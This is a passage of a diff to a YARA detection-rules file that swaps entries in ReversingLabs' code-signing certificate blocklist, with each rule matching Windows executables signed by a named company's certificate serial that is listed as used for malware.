 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ced47bd69b58de9e6b2aa7518ccceca088884acb79c0803c3defe6b115a0abb6"
+		logic_hash = "79b6df421c78fd3e2f05a60f7d875e02519297a0278614c9f63dff8b1b2a2d18"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22973,21 +45367,21 @@ rule REVERSINGLABS_Cert_Blocklist_E4E795Fd1Fd25595B869Ce22Aa7Dc49F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OASIS COURT LIMITED" and ( pe.signatures [ i ] . serial == "00:e4:e7:95:fd:1f:d2:55:95:b8:69:ce:22:aa:7d:c4:9f" or pe.signatures [ i ] . serial == "e4:e7:95:fd:1f:d2:55:95:b8:69:ce:22:aa:7d:c4:9f" ) and 1608508800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NOSOV SP Z O O" and pe.signatures [ i ] . serial == "0b:ab:6a:2a:a8:4b:49:5d:9e:55:4a:4c:42:c0:12:6d" and 1597971600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E953Ada7E8F1438E5F7680Ff599Ae43E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6314001C3235Cd59Bcc3F5278C518804 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2bce88d4-24e6-59e5-ae02-5284ec43cfa4"
+		id = "aff0fb76-587b-5493-810c-ac32a6ba9576"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11900-L11918"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5902-L5918"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7cb7d77abefd35f0756c5aa0983f7403cca4cbacd94dcc6b510c929bc96c8309"
+		logic_hash = "4320f3884c0f7e4939e8988a4e83b8028a5e01fb425ae4faa2273134db835813"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22997,21 +45391,21 @@ rule REVERSINGLABS_Cert_Blocklist_E953Ada7E8F1438E5F7680Ff599Ae43E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KULBYT LLC" and ( pe.signatures [ i ] . serial == "00:e9:53:ad:a7:e8:f1:43:8e:5f:76:80:ff:59:9a:e4:3e" or pe.signatures [ i ] . serial == "e9:53:ad:a7:e8:f1:43:8e:5f:76:80:ff:59:9a:e4:3e" ) and 1614729600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GIE-MUTUALISTE" and pe.signatures [ i ] . serial == "63:14:00:1c:32:35:cd:59:bc:c3:f5:27:8c:51:88:04" and 1600304400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_28C57Df09Ce7Cc3Fde2243Beb4D00101 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0Ed8Ade5D73B73Dade6943D557Ff87E5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "63e2edab-11a4-55ba-b042-c88b6d2750a5"
+		id = "dbfae40c-2f81-5daf-8655-d06ae38ffa8f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11920-L11936"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5920-L5936"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "84402dc0a58fca36424d8d6d13c60b80342bb3792f4e32e23878530264358726"
+		logic_hash = "7796b6e7da900be8634e7f1e51cda1275ab1e7c2709af7ecaa8777ab0b518494"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23021,21 +45415,21 @@ rule REVERSINGLABS_Cert_Blocklist_28C57Df09Ce7Cc3Fde2243Beb4D00101 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WATER, s.r.o." and pe.signatures [ i ] . serial == "28:c5:7d:f0:9c:e7:cc:3f:de:22:43:be:b4:d0:01:01" and 1622678400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rumikon LLC" and pe.signatures [ i ] . serial == "0e:d8:ad:e5:d7:3b:73:da:de:69:43:d5:57:ff:87:e5" and 1597885200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2D8Cfcf04209Dc7F771D8D18E462C35A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0292C7D574132Ba5C0441D1C7Ffcb805 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5ce5c076-87de-50f0-9fa1-a3efef8dd7f8"
+		id = "ef58cf01-9c54-5dbb-99a7-d3ca42663133"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11938-L11954"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5938-L5954"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2b784e46268d78046365400ef914d7ca673503c93962d0b0740ca2ac9faf7857"
+		logic_hash = "d2bcf72f4c5829d161bc40e820eb0b1a85deaa49b749422d5429e27b7fb2b1fe"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23045,21 +45439,21 @@ rule REVERSINGLABS_Cert_Blocklist_2D8Cfcf04209Dc7F771D8D18E462C35A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AA PLUS INVEST d.o.o." and pe.signatures [ i ] . serial == "2d:8c:fc:f0:42:09:dc:7f:77:1d:8d:18:e4:62:c3:5a" and 1631491200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TES LOGISTIKA d.o.o." and pe.signatures [ i ] . serial == "02:92:c7:d5:74:13:2b:a5:c0:44:1d:1c:7f:fc:b8:05" and 1602183720 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_016836311Fc39Fbb8E6F308Bb03Cc2B3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1F23F001458716D435Cca1A55D660Ec5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2c4061e8-0b8e-5c33-a746-6557449b17ed"
+		id = "16614e20-1cf1-55c0-a04c-d99c06fb29a2"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11956-L11972"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5956-L5972"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c5f6372a207d02283840e745619e93194d954eedff7bae34aadcb645b1cb78fc"
+		logic_hash = "bacfb4b7900ab57d23474e0422bd74fff113296b8db37e8eae3bd456443d28d6"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23069,21 +45463,21 @@ rule REVERSINGLABS_Cert_Blocklist_016836311Fc39Fbb8E6F308Bb03Cc2B3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SERVICE STREAM LIMITED" and pe.signatures [ i ] . serial == "01:68:36:31:1f:c3:9f:bb:8e:6f:30:8b:b0:3c:c2:b3" and 1602547200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Ringen" and pe.signatures [ i ] . serial == "1f:23:f0:01:45:87:16:d4:35:cc:a1:a5:5d:66:0e:c5" and 1603176940 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_435Abf46053A0A445C54217A8C233A7F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6E0Ccbdfb4777E10Ea6221B90Dc350C2 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "538d7405-be17-519e-beb5-fbef3beaedd3"
+		id = "64007bd7-b273-5579-8224-68337f1bc54d"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11974-L11990"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5974-L5990"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "839f55e8fe7a86aad406e657fdef48925543b5d3884927104fd3786444a8fccc"
+		logic_hash = "08a1ff7cc3a7680fdbb3235a7b46709cd4ba530a9afeab4344671db9fe893cc4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23093,21 +45487,21 @@ rule REVERSINGLABS_Cert_Blocklist_435Abf46053A0A445C54217A8C233A7F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Kodemika" and pe.signatures [ i ] . serial == "43:5a:bf:46:05:3a:0a:44:5c:54:21:7a:8c:23:3a:7f" and 1616976000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRAUMALAB INTERNATIONAL APS" and pe.signatures [ i ] . serial == "6e:0c:cb:df:b4:77:7e:10:ea:62:21:b9:0d:c3:50:c2" and 1603046620 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_B2F9C693A2E6634565F63C79B01Dd8F8 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0Ed1847A2Ae5D71Def1E833Fddd33D38 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c094666a-0bb3-5cb6-82a8-3074b9eed32b"
+		id = "11fd3bbe-5d15-57b7-a461-fc9c90046dbc"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11992-L12010"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5992-L6008"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f5ec67c082be21a2495ef90fd0a6d4fc4b1379c4903dcc051d39cf1913d5cf20"
+		logic_hash = "0ec5eb8ff1f630284fabfba5c58dd563d471343ace718f79dad08cfe75c3070d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23117,21 +45511,21 @@ rule REVERSINGLABS_Cert_Blocklist_B2F9C693A2E6634565F63C79B01Dd8F8 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PHL E STATE ApS" and ( pe.signatures [ i ] . serial == "00:b2:f9:c6:93:a2:e6:63:45:65:f6:3c:79:b0:1d:d8:f8" or pe.signatures [ i ] . serial == "b2:f9:c6:93:a2:e6:63:45:65:f6:3c:79:b0:1d:d8:f8" ) and 1620000000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SNAB-RESURS, OOO" and pe.signatures [ i ] . serial == "0e:d1:84:7a:2a:e5:d7:1d:ef:1e:83:3f:dd:d3:3d:38" and 1598662800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_54A6D33F73129E0Ef059Ccf51Be0C35E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_97Df46Acb26B7C81A13Cc467B47688C8 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1cf2bda8-05e6-5f0a-a28a-2f5fa02775c9"
+		id = "68e2fdc7-61cd-5e0a-8bc7-5e0ca96271c5"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12012-L12028"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6010-L6028"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6fbed9c8537ea2baeb58044a934fc9741730b8a3ae4d059c23b033973d7ff7d3"
+		logic_hash = "6f6e0e175caee83eaec2dacedaf564b642195a8815cfd0d4564f581070b0c545"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23141,21 +45535,21 @@ rule REVERSINGLABS_Cert_Blocklist_54A6D33F73129E0Ef059Ccf51Be0C35E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STAFFORD MEAT COMPANY, INC." and pe.signatures [ i ] . serial == "54:a6:d3:3f:73:12:9e:0e:f0:59:cc:f5:1b:e0:c3:5e" and 1607100127 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Information Civilized System Oy" and ( pe.signatures [ i ] . serial == "00:97:df:46:ac:b2:6b:7c:81:a1:3c:c4:67:b4:76:88:c8" or pe.signatures [ i ] . serial == "97:df:46:ac:b2:6b:7c:81:a1:3c:c4:67:b4:76:88:c8" ) and 1602636910 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_142Aac4217E22B525C8587589773Ba9B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_186D49Fac34Ce99775B8E7Ffbf50679D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "488be2f7-e3d4-51e3-b7bb-142caa7b2bd5"
+		id = "9279d4ee-3f53-5d68-aaa1-af6ed579310f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12030-L12046"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6030-L6046"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f169925c27f5e0f8d5f658b83d1b9fa4548c4443b16bd4d7f87aa2b8e44bf06b"
+		logic_hash = "0444a5052ee384451ebd85918bbc6bf6d6a75334899a63a8b5828ef06cb9c7ca"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23165,21 +45559,21 @@ rule REVERSINGLABS_Cert_Blocklist_142Aac4217E22B525C8587589773Ba9B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "A.B. gostinstvo trgovina posredni\\xC5\\xA1tvo in druge storitve, d.o.o." and pe.signatures [ i ] . serial == "14:2a:ac:42:17:e2:2b:52:5c:85:87:58:97:73:ba:9b" and 1614124800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hairis LLC" and pe.signatures [ i ] . serial == "18:6d:49:fa:c3:4c:e9:97:75:b8:e7:ff:bf:50:67:9d" and 1602234590 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_239664C12Baeb5A6D787912888051392 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B1Aea98Bf0Ce789B6C952310F14Edde0 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4d24a880-6fa5-5c22-875e-29f4985e3750"
+		id = "f039f379-e3d5-56bd-83b7-016881538017"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12048-L12064"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6048-L6066"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ab2c228088a4c11b3a0f1a5f0acf181cc31e548781cb3f1205475bfbe39c7236"
+		logic_hash = "6e78750d6aca91e9e6d8f2651a5682ccdab5cd20ee3a74e1f8582eb7bc45d614"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23189,21 +45583,21 @@ rule REVERSINGLABS_Cert_Blocklist_239664C12Baeb5A6D787912888051392 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORTH PROPERTY LTD" and pe.signatures [ i ] . serial == "23:96:64:c1:2b:ae:b5:a6:d7:87:91:28:88:05:13:92" and 1618272000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Absolut LLC" and ( pe.signatures [ i ] . serial == "00:b1:ae:a9:8b:f0:ce:78:9b:6c:95:23:10:f1:4e:dd:e0" or pe.signatures [ i ] . serial == "b1:ae:a9:8b:f0:ce:78:9b:6c:95:23:10:f1:4e:dd:e0" ) and 1602612570 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0218Ebfd5A9Bfd55D2F661F0D18D1D71 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2Dcd0699Da08915Dde6D044Cb474157C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d03619c7-c4e8-57bd-a19e-1452ab7a76df"
+		id = "e1f56719-e726-5f81-99d4-937e343cbcc9"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12066-L12082"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6068-L6084"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4aabe3beab0055b6ef8f6114c5236940f5693b44e94efd14132b450bb9232c03"
+		logic_hash = "e1a3f27b8b9b642fe1ca73ec54d225f4470b53d0d06f2eea55ad1ad43ec67b39"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23213,21 +45607,21 @@ rule REVERSINGLABS_Cert_Blocklist_0218Ebfd5A9Bfd55D2F661F0D18D1D71 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REI LUX UK LIMITED" and pe.signatures [ i ] . serial == "02:18:eb:fd:5a:9b:fd:55:d2:f6:61:f0:d1:8d:1d:71" and 1608508800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VENTE DE TOUT" and pe.signatures [ i ] . serial == "2d:cd:06:99:da:08:91:5d:de:6d:04:4c:b4:74:15:7c" and 1601830010 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_35590Ebe4A02Dc23317D8Ce47A947A9B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4B03Cabe6A0481F17A2Dbeb9Aefad425 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2f72a686-c30c-572d-a78c-03747ac325b6"
+		id = "30108ce3-b133-5e1d-924f-7caaf390e836"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12084-L12100"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6086-L6102"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2d4bc88943cdc8af00effab745e64e60ef662c668a0b2193c256d11831ef1554"
+		logic_hash = "6986e7bd90842647ec6a168c30dca2d5ae8ae5b1c1014f966dd596a78859ac6e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23237,21 +45631,21 @@ rule REVERSINGLABS_Cert_Blocklist_35590Ebe4A02Dc23317D8Ce47A947A9B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Largos" and pe.signatures [ i ] . serial == "35:59:0e:be:4a:02:dc:23:31:7d:8c:e4:7a:94:7a:9b" and 1602201600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RASSVET, OOO" and pe.signatures [ i ] . serial == "4b:03:ca:be:6a:04:81:f1:7a:2d:be:b9:ae:fa:d4:25" and 1603230930 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Aa07D4F2857119Cee514A0Bd412F8201 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_64Cd303Fa289790Afa03C403E9240002 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6bb83f26-90f5-587f-8c69-fa06beaead3e"
+		id = "86644ef8-4218-5a04-9655-c7d51729872d"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12102-L12120"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6104-L6120"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "fbbea89f2070b2a527bba6199022fbffd269e664b000988a59adf4ca0d4a9f22"
+		logic_hash = "f51556a8a12affbd7f7633bf8daa50e6332fa3d3448ea08853cf8ed28e593680"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23261,21 +45655,21 @@ rule REVERSINGLABS_Cert_Blocklist_Aa07D4F2857119Cee514A0Bd412F8201 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HANGA GIP d.o.o." and ( pe.signatures [ i ] . serial == "00:aa:07:d4:f2:85:71:19:ce:e5:14:a0:bd:41:2f:82:01" or pe.signatures [ i ] . serial == "aa:07:d4:f2:85:71:19:ce:e5:14:a0:bd:41:2f:82:01" ) and 1615766400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MAITLAND TRIFECTA, INC." and pe.signatures [ i ] . serial == "64:cd:30:3f:a2:89:79:0a:fa:03:c4:03:e9:24:00:02" and 1602723600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_40F5660A90301E7A8A8C3B42 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_07Cef66A71C35Bc3Aed6D100C6493863 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c47bb4f0-d60b-5948-ac10-6083606ed46a"
+		id = "9c16c370-a382-54f7-ba2e-3b738740966f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12122-L12138"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6122-L6138"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3573d1d5f11df106f1f6f44f8b0164992f2a50707c6df7b08b05ed9ea7d9173b"
+		logic_hash = "e741fc13fe4d03b145ed1d86e738b415a7260eae5b0908c6991c9ea9896f14cf"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23285,21 +45679,21 @@ rule REVERSINGLABS_Cert_Blocklist_40F5660A90301E7A8A8C3B42 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Booz Allen Hamilton Inc." and pe.signatures [ i ] . serial == "40:f5:66:0a:90:30:1e:7a:8a:8c:3b:42" and 1641833688 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fubon Technologies Ltd" and pe.signatures [ i ] . serial == "07:ce:f6:6a:71:c3:5b:c3:ae:d6:d1:00:c6:49:38:63" and 1602740890 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0400C7614F86D75Fe4Ee3F6192B6Feda : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Be77Fe5C58B7A360Add6A3Fced4E8334 : INFO FILE
 {
 	meta:
